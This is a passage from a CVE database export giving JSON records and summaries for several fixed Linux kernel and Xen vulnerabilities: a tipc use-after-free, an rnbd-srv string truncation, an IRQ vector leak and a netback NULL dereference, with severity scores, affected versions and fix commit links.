__netif_receive_skb_one_core+0x199/0x1e0 linux/net/core/dev.c:5534\n __netif_receive_skb+0x1f/0x1c0 linux/net/core/dev.c:5648\n process_backlog+0x101/0x6b0 linux/net/core/dev.c:5976\n __napi_poll.constprop.0+0xba/0x550 linux/net/core/dev.c:6576\n napi_poll linux/net/core/dev.c:6645\n net_rx_action+0x95a/0xe90 linux/net/core/dev.c:6781\n __do_softirq+0x21f/0x8e7 linux/kernel/softirq.c:553\n do_softirq linux/kernel/softirq.c:454\n do_softirq+0xb2/0xf0 linux/kernel/softirq.c:441\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0x100/0x120 linux/kernel/softirq.c:381\n local_bh_enable linux/./include/linux/bottom_half.h:33\n rcu_read_unlock_bh linux/./include/linux/rcupdate.h:851\n __dev_queue_xmit+0x871/0x3ee0 linux/net/core/dev.c:4378\n dev_queue_xmit linux/./include/linux/netdevice.h:3169\n neigh_hh_output linux/./include/net/neighbour.h:526\n neigh_output linux/./include/net/neighbour.h:540\n ip_finish_output2+0x169f/0x2550 linux/net/ipv4/ip_output.c:235\n __ip_finish_output linux/net/ipv4/ip_output.c:313\n __ip_finish_output+0x49e/0x950 linux/net/ipv4/ip_output.c:295\n ip_finish_output+0x31/0x310 linux/net/ipv4/ip_output.c:323\n NF_HOOK_COND linux/./include/linux/netfilter.h:303\n ip_output+0x13b/0x2a0 linux/net/ipv4/ip_output.c:433\n dst_output linux/./include/net/dst.h:451\n ip_local_out linux/net/ipv4/ip_output.c:129\n ip_send_skb+0x3e5/0x560 linux/net/ipv4/ip_output.c:1492\n udp_send_skb+0x73f/0x1530 linux/net/ipv4/udp.c:963\n udp_sendmsg+0x1a36/0x2b40 linux/net/ipv4/udp.c:1250\n inet_sendmsg+0x105/0x140 linux/net/ipv4/af_inet.c:850\n sock_sendmsg_nosec linux/net/socket.c:730\n __sock_sendmsg linux/net/socket.c:745\n __sys_sendto+0x42c/0x4e0 linux/net/socket.c:2191\n __do_sys_sendto linux/net/socket.c:2203\n __se_sys_sendto linux/net/socket.c:2199\n __x64_sys_sendto+0xe0/0x1c0 linux/net/socket.c:2199\n do_syscall_x64 linux/arch/x86/entry/common.c:52\n do_syscall_\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:25.063Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e19ec8ab0e25bc4803d7cc91c84e84532e2781bd"
},
{
"url": "https://git.kernel.org/stable/c/93bc2d6d16f2c3178736ba6b845b30475856dc40"
},
{
"url": "https://git.kernel.org/stable/c/367766ff9e407f8a68409b7ce4dc4d5a72afeab1"
},
{
"url": "https://git.kernel.org/stable/c/66116556076f0b96bc1aa9844008c743c8c67684"
},
{
"url": "https://git.kernel.org/stable/c/21ea04aad8a0839b4ec27ef1691ca480620e8e14"
},
{
"url": "https://git.kernel.org/stable/c/ffd4917c1edb3c3ff334fce3704fbe9c39f35682"
},
{
"url": "https://git.kernel.org/stable/c/a0fbb26f8247e326a320e2cb4395bfb234332c90"
},
{
"url": "https://git.kernel.org/stable/c/080cbb890286cd794f1ee788bbc5463e2deb7c2b"
}
],
"title": "tipc: fix UAF in error path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36886",
"datePublished": "2024-05-30T15:28:55.059Z",
"dateReserved": "2024-05-30T15:25:07.065Z",
"dateUpdated": "2025-05-04T09:11:25.063Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52618 (GCVE-0-2023-52618)
Vulnerability from cvelistv5
Published
2024-03-18 10:19
Modified
2025-05-20 14:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
block/rnbd-srv: Check for unlikely string overflow
Since "dev_search_path" can technically be as large as PATH_MAX,
there was a risk of truncation when copying it and a second string
into "full_path" since it was also PATH_MAX sized. The W=1 builds were
reporting this warning:
drivers/block/rnbd/rnbd-srv.c: In function 'process_msg_open.isra':
drivers/block/rnbd/rnbd-srv.c:616:51: warning: '%s' directive output may be truncated writing up to 254 bytes into a region of size between 0 and 4095 [-Wformat-truncation=]
616 | snprintf(full_path, PATH_MAX, "%s/%s",
| ^~
In function 'rnbd_srv_get_full_path',
inlined from 'process_msg_open.isra' at drivers/block/rnbd/rnbd-srv.c:721:14: drivers/block/rnbd/rnbd-srv.c:616:17: note: 'snprintf' output between 2 and 4351 bytes into a destination of size 4096
616 | snprintf(full_path, PATH_MAX, "%s/%s",
| ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
617 | dev_search_path, dev_name);
| ~~~~~~~~~~~~~~~~~~~~~~~~~~
To fix this, unconditionally check for truncation (as was already done
for the case where "%SESSNAME%" was present).
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2de6c8de192b9341ffa5e84afe1ce6196d4eef41 Version: 2de6c8de192b9341ffa5e84afe1ce6196d4eef41 Version: 2de6c8de192b9341ffa5e84afe1ce6196d4eef41 Version: 2de6c8de192b9341ffa5e84afe1ce6196d4eef41 Version: 2de6c8de192b9341ffa5e84afe1ce6196d4eef41 Version: 2de6c8de192b9341ffa5e84afe1ce6196d4eef41 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52618",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-19T15:51:11.544669Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T21:20:41.702Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.288Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95bc866c11974d3e4a9d922275ea8127ff809cf7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6abd5e17da33eba15df2bddc93413e76c2b55f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af7bbdac89739e2e7380387fda598848d3b7010f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5b9ea86e662035a886ccb5c76d56793cba618827"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2c6206f18104fba7f887bf4dbbfe4c41adc4339"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9e4bf6a08d1e127bcc4bd72557f2dfafc6bc7f41"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/block/rnbd/rnbd-srv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "95bc866c11974d3e4a9d922275ea8127ff809cf7",
"status": "affected",
"version": "2de6c8de192b9341ffa5e84afe1ce6196d4eef41",
"versionType": "git"
},
{
"lessThan": "f6abd5e17da33eba15df2bddc93413e76c2b55f7",
"status": "affected",
"version": "2de6c8de192b9341ffa5e84afe1ce6196d4eef41",
"versionType": "git"
},
{
"lessThan": "af7bbdac89739e2e7380387fda598848d3b7010f",
"status": "affected",
"version": "2de6c8de192b9341ffa5e84afe1ce6196d4eef41",
"versionType": "git"
},
{
"lessThan": "5b9ea86e662035a886ccb5c76d56793cba618827",
"status": "affected",
"version": "2de6c8de192b9341ffa5e84afe1ce6196d4eef41",
"versionType": "git"
},
{
"lessThan": "a2c6206f18104fba7f887bf4dbbfe4c41adc4339",
"status": "affected",
"version": "2de6c8de192b9341ffa5e84afe1ce6196d4eef41",
"versionType": "git"
},
{
"lessThan": "9e4bf6a08d1e127bcc4bd72557f2dfafc6bc7f41",
"status": "affected",
"version": "2de6c8de192b9341ffa5e84afe1ce6196d4eef41",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/block/rnbd/rnbd-srv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock/rnbd-srv: Check for unlikely string overflow\n\nSince \"dev_search_path\" can technically be as large as PATH_MAX,\nthere was a risk of truncation when copying it and a second string\ninto \"full_path\" since it was also PATH_MAX sized. The W=1 builds were\nreporting this warning:\n\ndrivers/block/rnbd/rnbd-srv.c: In function \u0027process_msg_open.isra\u0027:\ndrivers/block/rnbd/rnbd-srv.c:616:51: warning: \u0027%s\u0027 directive output may be truncated writing up to 254 bytes into a region of size between 0 and 4095 [-Wformat-truncation=]\n 616 | snprintf(full_path, PATH_MAX, \"%s/%s\",\n | ^~\nIn function \u0027rnbd_srv_get_full_path\u0027,\n inlined from \u0027process_msg_open.isra\u0027 at drivers/block/rnbd/rnbd-srv.c:721:14: drivers/block/rnbd/rnbd-srv.c:616:17: note: \u0027snprintf\u0027 output between 2 and 4351 bytes into a destination of size 4096\n 616 | snprintf(full_path, PATH_MAX, \"%s/%s\",\n | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n 617 | dev_search_path, dev_name);\n | ~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nTo fix this, unconditionally check for truncation (as was already done\nfor the case where \"%SESSNAME%\" was present)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-20T14:27:29.992Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/95bc866c11974d3e4a9d922275ea8127ff809cf7"
},
{
"url": "https://git.kernel.org/stable/c/f6abd5e17da33eba15df2bddc93413e76c2b55f7"
},
{
"url": "https://git.kernel.org/stable/c/af7bbdac89739e2e7380387fda598848d3b7010f"
},
{
"url": "https://git.kernel.org/stable/c/5b9ea86e662035a886ccb5c76d56793cba618827"
},
{
"url": "https://git.kernel.org/stable/c/a2c6206f18104fba7f887bf4dbbfe4c41adc4339"
},
{
"url": "https://git.kernel.org/stable/c/9e4bf6a08d1e127bcc4bd72557f2dfafc6bc7f41"
}
],
"title": "block/rnbd-srv: Check for unlikely string overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52618",
"datePublished": "2024-03-18T10:19:05.275Z",
"dateReserved": "2024-03-06T09:52:12.089Z",
"dateUpdated": "2025-05-20T14:27:29.992Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-31076 (GCVE-0-2024-31076)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
genirq/cpuhotplug, x86/vector: Prevent vector leak during CPU offline
The absence of IRQD_MOVE_PCNTXT prevents immediate effectiveness of
interrupt affinity reconfiguration via procfs. Instead, the change is
deferred until the next instance of the interrupt being triggered on the
original CPU.
When the interrupt next triggers on the original CPU, the new affinity is
enforced within __irq_move_irq(). A vector is allocated from the new CPU,
but the old vector on the original CPU remains and is not immediately
reclaimed. Instead, apicd->move_in_progress is flagged, and the reclaiming
process is delayed until the next trigger of the interrupt on the new CPU.
Upon the subsequent triggering of the interrupt on the new CPU,
irq_complete_move() adds a task to the old CPU's vector_cleanup list if it
remains online. Subsequently, the timer on the old CPU iterates over its
vector_cleanup list, reclaiming old vectors.
However, a rare scenario arises if the old CPU is outgoing before the
interrupt triggers again on the new CPU.
In that case irq_force_complete_move() is not invoked on the outgoing CPU
to reclaim the old apicd->prev_vector because the interrupt isn't currently
affine to the outgoing CPU, and irq_needs_fixup() returns false. Even
though __vector_schedule_cleanup() is later called on the new CPU, it
doesn't reclaim apicd->prev_vector; instead, it simply resets both
apicd->move_in_progress and apicd->prev_vector to 0.
As a result, the vector remains unreclaimed in vector_matrix, leading to a
CPU vector leak.
To address this issue, move the invocation of irq_force_complete_move()
before the irq_needs_fixup() call to reclaim apicd->prev_vector, if the
interrupt is currently or used to be affine to the outgoing CPU.
Additionally, reclaim the vector in __vector_schedule_cleanup() as well,
following a warning message, although theoretically it should never see
apicd->move_in_progress with apicd->prev_cpu pointing to an offline CPU.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:00.420Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a40209d355afe4ed6d533507838c9e5cd70a76d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f5f4675960609d8c5ee95f027fbf6ce380f98372"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6752dfcfff3ac3e16625ebd3f0ad9630900e7e76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9eeda3e0071a329af1eba15f4e57dc39576bb420"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e9c96d01d520498b169ce734a8ad1142bef86a30"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/59f86a2908380d09cdc726461c0fbb8d8579c99f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ebfb16fc057a016abb46a9720a54abf0d4f6abe1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6c11c0a5235fb144a65e0cb2ffd360ddc1f6c32"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-31076",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:53.896904Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:46.615Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/kernel/apic/vector.c",
"kernel/irq/cpuhotplug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a40209d355afe4ed6d533507838c9e5cd70a76d8",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "f5f4675960609d8c5ee95f027fbf6ce380f98372",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "6752dfcfff3ac3e16625ebd3f0ad9630900e7e76",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "9eeda3e0071a329af1eba15f4e57dc39576bb420",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "e9c96d01d520498b169ce734a8ad1142bef86a30",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "59f86a2908380d09cdc726461c0fbb8d8579c99f",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "ebfb16fc057a016abb46a9720a54abf0d4f6abe1",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "a6c11c0a5235fb144a65e0cb2ffd360ddc1f6c32",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/kernel/apic/vector.c",
"kernel/irq/cpuhotplug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.13"
},
{
"lessThan": "4.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngenirq/cpuhotplug, x86/vector: Prevent vector leak during CPU offline\n\nThe absence of IRQD_MOVE_PCNTXT prevents immediate effectiveness of\ninterrupt affinity reconfiguration via procfs. Instead, the change is\ndeferred until the next instance of the interrupt being triggered on the\noriginal CPU.\n\nWhen the interrupt next triggers on the original CPU, the new affinity is\nenforced within __irq_move_irq(). A vector is allocated from the new CPU,\nbut the old vector on the original CPU remains and is not immediately\nreclaimed. Instead, apicd-\u003emove_in_progress is flagged, and the reclaiming\nprocess is delayed until the next trigger of the interrupt on the new CPU.\n\nUpon the subsequent triggering of the interrupt on the new CPU,\nirq_complete_move() adds a task to the old CPU\u0027s vector_cleanup list if it\nremains online. Subsequently, the timer on the old CPU iterates over its\nvector_cleanup list, reclaiming old vectors.\n\nHowever, a rare scenario arises if the old CPU is outgoing before the\ninterrupt triggers again on the new CPU.\n\nIn that case irq_force_complete_move() is not invoked on the outgoing CPU\nto reclaim the old apicd-\u003eprev_vector because the interrupt isn\u0027t currently\naffine to the outgoing CPU, and irq_needs_fixup() returns false. Even\nthough __vector_schedule_cleanup() is later called on the new CPU, it\ndoesn\u0027t reclaim apicd-\u003eprev_vector; instead, it simply resets both\napicd-\u003emove_in_progress and apicd-\u003eprev_vector to 0.\n\nAs a result, the vector remains unreclaimed in vector_matrix, leading to a\nCPU vector leak.\n\nTo address this issue, move the invocation of irq_force_complete_move()\nbefore the irq_needs_fixup() call to reclaim apicd-\u003eprev_vector, if the\ninterrupt is currently or used to be affine to the outgoing CPU.\n\nAdditionally, reclaim the vector in __vector_schedule_cleanup() as well,\nfollowing a warning message, although theoretically it should never see\napicd-\u003emove_in_progress with apicd-\u003eprev_cpu pointing to an offline CPU."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:07.572Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a40209d355afe4ed6d533507838c9e5cd70a76d8"
},
{
"url": "https://git.kernel.org/stable/c/f5f4675960609d8c5ee95f027fbf6ce380f98372"
},
{
"url": "https://git.kernel.org/stable/c/6752dfcfff3ac3e16625ebd3f0ad9630900e7e76"
},
{
"url": "https://git.kernel.org/stable/c/9eeda3e0071a329af1eba15f4e57dc39576bb420"
},
{
"url": "https://git.kernel.org/stable/c/e9c96d01d520498b169ce734a8ad1142bef86a30"
},
{
"url": "https://git.kernel.org/stable/c/59f86a2908380d09cdc726461c0fbb8d8579c99f"
},
{
"url": "https://git.kernel.org/stable/c/ebfb16fc057a016abb46a9720a54abf0d4f6abe1"
},
{
"url": "https://git.kernel.org/stable/c/a6c11c0a5235fb144a65e0cb2ffd360ddc1f6c32"
}
],
"title": "genirq/cpuhotplug, x86/vector: Prevent vector leak during CPU offline",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-31076",
"datePublished": "2024-06-21T10:18:04.335Z",
"dateReserved": "2024-06-21T10:13:16.276Z",
"dateUpdated": "2025-11-04T17:20:00.420Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-46838 (GCVE-0-2023-46838)
Vulnerability from cvelistv5
Published
2024-01-29 10:18
Modified
2025-11-04 18:18
Severity ?
VLAI Severity ?
EPSS score ?
Summary
Transmit requests in Xen's virtual network protocol can consist of
multiple parts. While not really useful, except for the initial part
any of them may be of zero length, i.e. carry no data at all. Besides a
certain initial portion of the to be transferred data, these parts are
directly translated into what Linux calls SKB fragments. Such converted
request parts can, when for a particular SKB they are all of length
zero, lead to a de-reference of NULL in core networking code.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:18:51.507Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://xenbits.xenproject.org/xsa/advisory-448.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFYW6R64GPLUOXSQBJI3JBUX3HGLAYPP/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGEKT4DKSDXDS34EL7M4UVJMMPH7Z3ZZ/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "http://xenbits.xen.org/xsa/advisory-448.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-46838",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-02T19:06:43.742416Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-06-02T19:07:44.512Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "Linux",
"vendor": "Linux",
"versions": [
{
"status": "unknown",
"version": "consult Xen advisory XSA-448"
}
]
}
],
"configurations": [
{
"lang": "en",
"value": "All systems using a Linux based network backend with kernel 4.14 and\nnewer are vulnerable. Earlier versions may also be vulnerable. Systems\nusing other network backends are not known to be vulnerable."
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "This issue was discovered by Pratyush Yadav of Amazon."
}
],
"datePublic": "2024-01-22T18:30:00.000Z",
